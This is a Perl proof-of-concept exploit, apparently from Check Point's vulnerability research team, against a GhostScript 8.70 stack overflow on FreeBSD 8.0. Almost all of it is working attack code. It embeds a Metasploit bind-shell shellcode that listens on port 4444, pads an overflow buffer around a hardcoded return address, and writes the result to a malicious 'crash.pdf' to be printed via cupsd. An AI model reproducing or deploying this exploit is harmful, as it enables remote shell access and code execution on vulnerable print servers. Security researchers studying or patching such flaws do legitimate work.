########################################################################## # Check Point Software Technologies - Vulnerability Discovery Team (VDT) # # Rodrigo Rubira Branco - # # # # GhostScript Stack Overflow # # # ########################################################################## # bsd/x86/shell_bind_tcp - 214 bytes # http://www.metasploit.com # Encoder: x86/alpha_upper # AppendExit=false, PrependSetresuid=false, # PrependSetuid=false, LPORT=4444, RHOST=, # PrependSetreuid=false my $buf = "\x54\x5a\xda\xd1\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43" . "\x43\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58" . "\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" . "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" . "\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x50\x31\x49\x50" . "\x46\x30\x45\x38\x4b\x4f\x44\x42\x42\x31\x51\x4c\x4d\x59" . "\x4b\x57\x50\x50\x43\x5a\x45\x51\x42\x4a\x44\x42\x42\x4a" . "\x44\x50\x4e\x50\x45\x31\x48\x4d\x4b\x30\x51\x47\x46\x30" . "\x46\x30\x43\x5a\x45\x38\x51\x48\x48\x4d\x4b\x30\x4d\x59" . "\x51\x57\x4a\x4c\x48\x30\x43\x5a\x48\x4d\x4d\x50\x4e\x50" . "\x45\x4e\x48\x4d\x4d\x50\x50\x50\x50\x50\x43\x5a\x51\x4a" . "\x50\x58\x48\x4d\x4d\x50\x4b\x4f\x50\x4f\x4a\x44\x43\x49" . "\x4b\x46\x46\x30\x42\x48\x46\x4f\x46\x4f\x44\x33\x42\x48" . "\x43\x58\x46\x4f\x43\x52\x45\x39\x42\x4e\x4b\x39\x4b\x53" . "\x46\x30\x46\x34\x50\x53\x50\x50\x48\x30\x47\x4b\x48\x4d" . "\x4d\x50\x41\x41"; $pkt = "e!PS". "A" x 500 . "00001111222233334444555556666777788889999aaa". "\x40\xd9\xbf\xbf". #Shellcode Addr "bccccddd". "\xef\xbe\xbf\xbf". "ffff". "\xff\xbf" x 100 . "C" x (1200 - length($buf)) . $buf . "Z" x 100; print STDERR "Check Point Vulnerability Discovery Team (VDT)\n"; print STDERR "GhostScript 8.70 exploit for FreeBSD 8.0!\n"; print STDERR "Rodrigo Rubira Branco (BSDaemon)\n"; print STDERR "\nCreating evil pdf ..."; open(F,">crash.pdf"); print F $pkt; close(F); print STDERR " d0ne!\n"; print "Now print it via cupsd!\n";